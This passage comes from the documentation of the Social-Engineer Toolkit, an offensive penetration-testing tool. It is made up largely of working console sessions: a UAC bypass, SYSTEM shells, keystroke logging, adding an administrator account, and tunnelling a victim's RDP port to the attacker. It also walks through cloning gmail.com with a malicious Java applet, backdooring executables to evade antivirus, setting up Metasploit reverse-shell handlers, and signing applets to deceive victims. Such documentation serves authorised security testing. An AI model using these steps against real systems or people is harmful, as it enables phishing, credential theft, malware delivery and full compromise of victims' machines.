4016Example exec ls -al
4017
4018Command: bypassuac <ipaddress_of_listener> <port_of_listener> <x86 or x64>
4019
4020Explanation: Trigger another SET interactive shell with the UAC safe flag
4021
4022Example bypassuac 172.16.32.128 443 x64
4023
4024 Command: grabsystem <ipaddress_of_listener> <port_of_listener>
4025
4026Explanation: Uploads a new set interactive shell running as a service and as SYSTEM.
4027
4028Caution: If using on Windows 7 with UAC enabled, run bypassuac first before running this.
4029
4030Example: grabsystem 172.16.32.128 443
4031
4032Command: keystroke_start
4033
4034Explanation: Starts a keystroke logger on the victim machine. It will stop when shell exits.
4035
4036Example: keystroke_start
4037
4038Command: keystroke_dump
4039
4040Explanation: Dumps the information from the keystroke logger. You must run keystroke_start first.
4041
4042Example: keystroke_dump
4043
4044Command: lockworkstation
4045
4046Explanation: Will lock the victims workstation forcing them to log back in. Useful for capturing keystrokes.
4047
4048Example: lockworkstation
4049
4050set> shell
4051
4052[*] Entering a Windows Command Prompt. Enter your commands below.
4053
4054set/command_shell>net user dave P@55w0rd! /ADD
4055
4056System error 5 has occurred.
4057
4058Access is denied.
4059
4060set/command_shell>quit
4061
4062[*] Dropping back to interactive shell…
4063
4064bset> bypassuac 172.16.32.135 443 x64
4065
4066[*] Attempting to upload UAC bypass to the victim machine.
4067
4068[*] Initial bypass has been uploaded to victim successfully.
4069
4070[*] Attempting to upload interactive shell to victim machine.
4071
4072[*] SET Interactive shell successfully uploaded to victim.
4073
4074[*] You should have a new shell spawned that is UAC safe in a few seconds…
4075
4076set> [*] Connection received from: 172.16.32.170
4077
4078set> quit
4079
4080[*] Dropping back to list of victims.
4081
4082*** Pick the number of the shell you want ***
4083
40841: 172.16.32.170:UAC-Safe
4085
40862: 172.16.32.170
4087
4088Enter your numeric choice: 1
4089
4090[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
4091
4092set> shell
4093
4094[*] Entering a Windows Command Prompt. Enter your commands below.
4095
4096set/command_shell>net user dave P@55w0rd! /ADD
4097
4098The command completed successfully.
4099
4100set/command_shell>
4101
4102From the example above, we had one shell connect back to us. Say 30 shells connected back to us, you would see a listing of the different IP addresses and shells available to you. In this scenario we ran into a small problem, we were targeting a system that had User Access Control enabled. By initiating the bypassuac flag within the SET interactive shell, we were able to spawn a “UAC Safe” shell on the system and fully compromise it. Conversely, once we have a UAC-Safe based shell, we can also leverage the “grabsystem <ipaddress> <port>” command to spawn a shell that is running as SYSTEM on the victim machine. In the next example we’ll port forward the victims remote desktop protocol (RDP) port (3389) from the attacker machine over SSH back to us.
4103
4104set> ssh_tunnel
4105
4106[!] Usage: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>
4107
4108set> ssh_tunnel 172.16.32.135 22 3389 root hackme 3389
4109
4110[*] Telling the victim machine we are switching to SSH tunnel mode..
4111
4112[*] Acknowledged the server supports SSH tunneling..
4113
4114[*] Tunnel is establishing, check IP Address: 172.16.32.135 on port: 3389
4115
4116[*] As an example if tunneling RDP you would rdesktop localhost 3389
4117
4118set>
4119
4120Now all we would need to do in our attack machine is initiate the “rdesktop localhost:3389” to connect to the victim machine. Next, we’ll do a simple keystroke logging on the victim machine.
4121
4122set> keystroke_start
4123
4124[*] Keystroke logger has been started on the victim machine
4125
4126set> keystroke_dump
4127
4128this is a test
4129
4130set>
4131
4132These are just some of the commands available, you can also upload and download files on the system, add a local admin, add a domain admin, and much more. Simply type “help” or “?” in the interactive shell to test the features out.
4133
4134RATTE tutorial coming soon.
4135SET Automation
4136
4137SET has a feature called “set-automate” which will take an answer file (explained in a second) and enter the commands in the menu mode for you. For example in prior walkthroughs you have to enter each menu each time you prep the attack. So for example if I wanted to do the Java Applet I would do this:
4138
4139Select from the menu:
4140
4141 1) Spear-Phishing Attack Vectors
4142
4143 2) Website Attack Vectors
4144
4145 3) Infectious Media Generator
4146
4147 4) Create a Payload and Listener
4148
4149 5) Mass Mailer Attack
4150
4151 6) Arduino-Based Attack Vector
4152
4153 7) SMS Spoofing Attack Vector
4154
4155 8) Wireless Access Point Attack Vector
4156
4157 9) QRCode Generator Attack Vector
4158
4159 10) Powershell Attack Vectors
4160
4161 11) Third Party Modules
4162
4163 99) Return back to the main menu.
4164
4165 set> 2
4166
4167 The Web Attack module is a unique way of utilizing multiple web-based attacks
4168
4169 in order to compromise the intended victim.
4170
4171 The Java Applet Attack method will spoof a Java Certificate and deliver a
4172
4173 metasploit based payload. Uses a customized java applet created by Thomas
4174
4175 Werth to deliver the payload.
4176
4177 The Metasploit Browser Exploit method will utilize select Metasploit
4178
4179 browser exploits through an iframe and deliver a Metasploit payload.
4180
4181 The Credential Harvester method will utilize web cloning of a web-
4182
4183 site that has a username and password field and harvest all the
4184
4185 information posted to the website.
4186
4187 The TabNabbing method will wait for a user to move to a different
4188
4189 tab, then refresh the page to something different.
4190
4191 The Man Left in the Middle Attack method was introduced by Kos and
4192
4193 utilizes HTTP REFERER’s in order to intercept fields and harvest
4194
4195 data from them. You need to have an already vulnerable site and in-
4196
4197 corporate <script src=”http://YOURIP/”>. This could either be from a
4198
4199 compromised site or through XSS.
4200
4201 The Web-Jacking Attack method was introduced by white_sheep, Emgent
4202
4203 and the Back|Track team. This method utilizes iframe replacements to
4204
4205 make the highlighted URL link to appear legitimate however when clicked
4206
4207 a window pops up then is replaced with the malicious link. You can edit
4208
4209 the link replacement settings in the set_config if its too slow/fast.
4210
4211 The Multi-Attack method will add a combination of attacks through the web attack
4212
4213 menu. For example you can utilize the Java Applet, Metasploit Browser,
4214
4215 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
4216
4217 all at once to see which is successful.
4218
4219 1) Java Applet Attack Method
4220
4221 2) Metasploit Browser Exploit Method
4222
4223 3) Credential Harvester Attack Method
4224
4225 4) Tabnabbing Attack Method
4226
4227 5) Man Left in the Middle Attack Method
4228
4229 6) Web Jacking Attack Method
4230
4231 7) Multi-Attack Web Method
4232
4233 8) Victim Web Profiler
4234
4235 9) Create or import a CodeSigning Certificate
4236
4237 99) Return to Main Menu
4238
4239 set:webattack> 1
4240
4241The first method will allow SET to import a list of pre-defined
4242
4243web applications that it can utilize within the attack.
4244
4245The second method will completely clone a website of your choosing
4246
4247and allow you to utilize the attack vectors within the completely
4248
4249same web application you were attempting to clone.
4250
4251The third method allows you to import your own website, note that you
4252
4253should only have an index.html when using the import website
4254
4255functionality.
4256
4257[!] Website Attack Vectors [!]
4258
42591. Web Templates
4260
42612. Site Cloner
4262
42633. Custom Import
4264
42654. Return to main menu
4266
4267Enter number (1-4): 2
4268
4269SET supports both HTTP and HTTPS
4270
4271Example: http://www.thisisafakesite.com
4272
4273Enter the url to clone: https://gmail.com
4274
4275[*] Cloning the website: https://gmail.com
4276
4277[*] This could take a little bit…
4278
4279[*] Injecting Java Applet attack into the newly cloned website.
4280
4281[*] Filename obfuscation complete. Payload name is: 8J5ovr0lC9tW
4282
4283[*] Malicious java applet website prepped for deployment
4284
4285What payload do you want to generate:
4286
4287Name: Description:
4288
42891. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
4290
42912. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
4292
42933. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4294
42954. Windows Bind Shell Execute payload and create an accepting port on remote system.
4296
42975. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
4298
42996. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
4300
43017. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
4302
43038. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
4304
43059. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
4306
430710. Windows Meterpreter Reverse DNS Tunnel communications over DNS and spawn a Meterpreter console
4308
430911. Import your own executable Specify a path for your own executable
4310
4311Enter choice (hit enter for default):
4312
4313Below is a list of encodings to try and bypass AV.
4314
4315 Select one of the below, ‘backdoored executable’ is typically the best.
4316
4317 1. avoid_utf8_tolower (Normal)
4318
43192. shikata_ga_nai (Very Good)
4320
43213. alpha_mixed (Normal)
4322
43234. alpha_upper (Normal)
4324
43255. call4_dword_xor (Normal)
4326
43276. countdown (Normal)
4328
43297. fnstenv_mov (Normal)
4330
43318. jmp_call_additive (Normal)
4332
43339. nonalpha (Normal)
4334
433510. nonupper (Normal)
4336
433711. unicode_mixed (Normal)
4338
433912. unicode_upper (Normal)
4340
434113. alpha2 (Normal)
4342
434314. No Encoding (None)
4344
434515. Multi-Encoder (Excellent)
4346
434716. Backdoored Executable (BEST)
4348
4349Enter your choice (enter for default):
4350
4351[-] Enter the PORT of the listener (enter for default):
4352
4353[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds…
4354
4355[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
4356
4357********************************************************
4358
4359Do you want to create a Linux/OSX reverse_tcp payload
4360
4361in the Java Applet attack as well?
4362
4363********************************************************
4364
4365Enter choice yes or no: no
4366
4367Looking through the options, we selected:
4368
43691
4370
43712
4372
43731
4374
4375https://gmail.com
4376
4377no
4378
4379If you create a text file called moo.txt or whatever you want and input that into it you can call set-automate and it will enter it for you each time.
4380
4381root@bt:/pentest/exploits/set# ./set-automate moo.txt
4382
4383[*] Spawning SET in a threaded process…
4384
4385[*] Sending command 1 to the interface…
4386
4387[*] Sending command 2 to the interface…
4388
4389[*] Sending command 1 to the interface…
4390
4391[*] Sending command https://gmail.com to the interface…
4392
4393[*] Sending command default to the interface…
4394
4395[*] Sending command default to the interface…
4396
4397[*] Sending command default to the interface…
4398
4399[*] Sending command no to the interface…
4400
4401[*] Sending command default to the interface…
4402
4403[*] Finished sending commands, interacting with the interface..
4404SET Web-Interface
4405
4406The web interface for the Social-Engineer Toolkit takes whatever you select and generates an answer file that is ultimately placed into set-automate. Each response assigns a given value and the built in intelligence on the back-end parses your responses into building and crafting the attack into SET. To turn the web interface simply type ./set-web
4407
4408root@bt:/pentest/exploits/set# ./set-web
4409
4410[*] Starting the SET Command Center on port: 44444
4411
4412| |
4413
4414| |
4415
4416| The Social-Engineer Toolkit |
4417
4418| Command Center |
4419
4420| |
4421
4422| May the pwn be with you |
4423
4424|______________________________________________________|
4425
4426 All results from the web interface will be displayed
4427
4428 in this terminal.
4429
4430[*] Interface is bound to http://127.0.0.1 on port 44444 (open browser to ip/port)
4431
4432Once the SET Web Interface is running, browse to localhost:44444. SET will only listen on localhost, you will not be able to get to it remotely.
4433
4434The web interface should be pretty self-explanatory if you’re familiar with the menu mode. One thing to note is that under the update’s menu, you’ll notice that you can dynamically edit the configuration options. When you save the new settings to the file, it will actually propagate different options in different menus. For example, if you turn on self-signed-applets to ON, new options will appear under the web attack menu. Otherwise, the options will remain hidden. To launch an attack, just click on one of the attack vectors, fill out the appropriate attacks and hit launch attack. Check your window that you launched the web interface on, and you should see the attack being launched.
4435Frequently Asked Questions
4436
4437In an effort to avoid confusion and help understand some of the common questions with SET.
4438
4439Q. I’m using NAT/Port forwarding, how can I configure SET to support this scenario?
4440
4441A. Edit the config/set_config file and turn AUTO_DETECT=ON to AUTO_DETECT=OFF. Once this option is you will be prompted with the following questions:
4442
4443NAT/Port Forwarding can be used in the cases where your SET machine is
4444
4445not externally exposed and may be a different IP address than your reverse listener.
4446
4447Are you using NAT/Port Forwarding? yes or no: yes
4448
4449Enter the IP address to your SET web server (external IP or hostname): externalipgoeshere
4450
4451In some cases you may have your listener on a different IP address, if this is the case the next question asks if your IP address is different for the reverse handler/listener. If that is the case, specify yes, and enter your separate IP address for the listener.
4452
4453Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address (yes or no): yes
4454
4455Enter the IP address for the reverse handler (reverse payload): otherexternalipgoeshere
4456
4457Q. My Java Applet isn’t working correctly and don’t get prompted for the Applet when browsing the site.
4458
4459A. You either do not have Java installed on the victim machine, or your using a NAT/Port forwarding scenario and you need to turn AUTO_DETECT=ON to AUTO_DETECT=OFF. If you do a view source on the webpage, the applet should be downloaded from your IP address that is accessible from the victim. In some cases SET may grab the wrong interface IP as well, in this scenario you again will want to edit the set_config and turn AUTO_DETECT to OFF
4460Code Signing Certificates
4461
4462Most recently, Java released an update that hindered the Java Applet attack slightly. In traditional attack forms when using the Java Applet attack, you could create a self-signed certificate and the publisher could be manipulated to show whatever you wanted. A few months back they released a new update that showed Publish: (UNKNOWN) – PUBLISHERNAME. Although a bit of a hindrance, it wasn’t bad. If a prominent name was still used, the success ratio was not hindered and the attack vector was still effective.
4463
4464In the most recent version of Java, it now shows a big “UNKNOWN” under publisher and that is it. This isn’t a major showstopper however it does reduce the effectiveness slightly on the success ratios on how SET works. In order to compensate for these changes, the Java Repeater was introduced. If the victim clicks cancel on the applet, it prompts the java applet run again, over and over until they hit run. This is great but it wasn’t 100 percent.
4465
4466Introduced in SET v1.4, you can now purchase your own code-signing certificate ($200.00ish) and sign your own certificates with whatever you want. This allows you to sign the publisher name with whatever you want and get away with the attacks from before.
4467
4468You can create the request and copy and paste the data within the SET menus or you can do it on your own and then import it into SET. Simply go into the Web Attack vector and select the Create or Import a Code Signing certificate. This will replace the Signed_Update.jar.orig which is the template used for all the Java Applet attacks. From then on out, you will be able to leverage your code-signing certificate within the SET attack vector.
4469Developing your own SET modules
4470
4471In version 1.2 introduced the core library modules and the ability to add third party modules into SET. Essentially, the folder located in the SET root “modules” can add additions or enhancements to SET and add additional contributions to the toolkit. The first thing to note is that when you add a new “.py” file to the modules directory, it will automatically be imported into SET under “Third Party Modules”. Below is an example of a test module:
4472
4473#
4474
4475# These are required fields
4476
4477#
4478
4479import sys
4480
4481# switch over to import core
4482
4483sys.path.append(“src/core”)
4484
4485# import the core modules
4486
4487try: reload(core)
4488
4489except: import core
4490
4491MAIN=”This is a test module”
4492
4493AUTHOR=”Dave ‘ReL1K’ davek@social-engineer.org”
4494
4495# def main(): header is required
4496
4497def main():
4498
4499core.java_applet_attack(“https://gmail.com”,”443?,”reports/”)
4500
4501pause=raw_input(“This module has finished completing. Press <enter> to continue”)
4502
4503In this example, we create a simple module that will use the java applet attack vector, clone a website and launch the attack for us. It handles creating the Metasploit payloads and everything for us. Ultimately you can create whatever you want to using the function calls built into SET or creating your own. Now if we run SET:
4504
4505root@bt:/pentest/exploits/set# ./set
4506
4507 ..######..########.########
4508
4509 .##….##.##……….##…
4510
4511 .##…….##……….##…
4512
4513 ..######..######……##…
4514
4515 …….##.##……….##…
4516
4517 .##….##.##……….##…
4518
4519 ..######..########….##…
4520
4521 [—] The Social-Engineer Toolkit (SET) [—]
4522
4523 [—] Written by David Kennedy (ReL1K) [—]
4524
4525 [—] Version: 1.2 [—]
4526
4527 [—] Codename: ‘Shakawkaw’ [—]
4528
4529 [—] Report bugs to: davek@social-engineer.org [—]
4530
4531 [—] Follow Me On Twitter: dave_rel1k [—]
4532
4533 [—] Homepage: http://www.secmaniac.com [—]
4534
4535 [—] Framework: https://www.social-engineer.org [—]
4536
4537 Welcome to the Social-Engineer Toolkit (SET). Your one
4538
4539 stop shop for all of your social-engineering needs..
4540
4541 DerbyCon 2011 Sep30-Oct02 – http://www.derbycon.com
4542
4543Select from the menu:
4544
45451. Spear-Phishing Attack Vectors
4546
45472. Website Attack Vectors
4548
45493. Infectious Media Generator
4550
45514. Create a Payload and Listener
4552
45535. Mass Mailer Attack
4554
45556. Teensy USB HID Attack Vector
4556
45577. SMS Spoofing Attack Vector
4558
45598. Third Party Modules
4560
45619. Update the Metasploit Framework
4562
456310. Update the Social-Engineer Toolkit
4564
456511. Help, Credits, and About
4566
456712. Exit the Social-Engineer Toolkit
4568
4569Enter your choice: 8
4570
4571Welcome to the Social-Engineer Toolkit Third Party Modules menu.
4572
4573Please read the readme/modules.txt for more information on how to create your
4574
4575own modules.
4576
45771. This is a test module
4578
45792. Return to the previous menu.
4580
4581Enter the module you want to use: 1
4582
4583[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds…
4584
4585[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
4586
4587[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
4588
4589[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.
4590
4591[*] Executable created under src/program_junk/ajk1K7Wl.exe
4592
4593[*] Cloning the website: https://gmail.com
4594
4595[*] This could take a little bit…
4596
4597[*] Injecting Java Applet attack into the newly cloned website.
4598
4599[*] Filename obfuscation complete. Payload name is: m3LrpBcbjm13u
4600
4601[*] Malicious java applet website prepped for deployment
4602
4603Site has been successfully cloned and is: reports/
4604
4605[*] Starting the multi/handler through Metasploit…
4606
4607 o 8 o o
4608
4609 8 8 8
4610
4611ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
4612
46138' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
4614
46158 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
4616
46178 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
4618
4619..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
4620
4621::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
4622
4623::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
4624
4625 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
4626
4627+ — –=[ 891 exploits – 484 auxiliary – 149 post
4628
4629+ — –=[ 251 payloads – 28 encoders – 8 nops
4630
4631 =[ svn r15540 updated 23 days ago (2012.06.27)
4632
4633resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> use multi/handler
4634
4635resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set payload windows/meterpreter/reverse_tcp
4636
4637payload => windows/meterpreter/reverse_tcp
4638
4639resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LHOST 0.0.0.0
4640
4641LHOST => 0.0.0.0
4642
4643resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LPORT 443
4644
4645LPORT => 443
4646
4647resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> exploit -j
4648
4649[*] Exploit running as background job.
4650
4651[*] Started reverse handler on 0.0.0.0:443
4652
4653[*] Starting the payload handler…
4654
4655msf exploit(handler) >
4656
4657msf exploit(handler) >
4658
4659msf exploit(handler) > exit
4660
4661This module has finished completing. Press <enter> to continue
4662
4663The core system files are located under src/core/core.py and can be modified and expanded upon. Here is a list of all of the current function calls supported and their parameters:
4664
4665core.meta_path() # Returns the path of the Metasploit directory in the set_config
4666
4667core.grab_ipaddress() # Returns your IP address used for the attacks
4668
4669core.check_pexpect() # Checks to see if the Python module PEXPECT is installed
4670
4671core.check_beautifulsoup() # Check to see if the Python module BeautifulSoup is installed
4672
4673core.cleanup_routine() # Removed stale process information, files, etc.
4674
4675core.update_metasploit() # Updates the Metasploit framework
4676
4677core.update_set() # Updates the Social-Engineer Toolkit
4678
4679core.help_menu() # Displays the help menu
4680
4681core.date_time() # Displays the date and time
4682
4683core.generate_random_string(low,high) # generates a number between the low and high range (random). So you could use generate_random_string(1,30) and it will create a unique string between 1 and 30 characters long
4684
4685core.site_cloner(website,exportpath, *args) # clones a website and exports it to a specific path. So for example you could use core.site_cloner(“https://gmail.com”,”reports/”) and it will clone the website and export it to the reports directory.
4686
4687core.meterpreter_reverse_tcp_exe(port) # creates a meterpreter reverse payload, only need to specify port.
4688
4689core.metasploit_listener_start(payload,port) # creates a meterpreter listener, only need to specify payload (example windows/meterpreter/reverse_tcp) and port.
4690
4691core.start_web_server(directory) # Starts a web server in the directory root you specify, for example core.start_web_server(“reports”)
4692
4693core.java_applet_attack(website,port,directory) # Clones a website, creates meterpreter backdoor, starts a webserver and creates the listener. The port is the meterpreter reverse listener port. Example core.java_applet_attack(“https://gmail.com”,”443”,”reports/”
4694
4695core.teensy_pde_generator(attack_method) # Creates a teensy pde file you can use for the teensy USB HID attack vector. You can call the following attack methods: beef, powershell_down, powershell_reverse, java_applet, and wscript. Example: teensy_pde_generator(“powershell_reverse”)
4696
4697windows_root() # grabs the windows environment root path, for example C:\WINDOWS
4698
4699upx(path_to_file) # packs a binary via the UPX encoding, also obfuscates a bit better as well.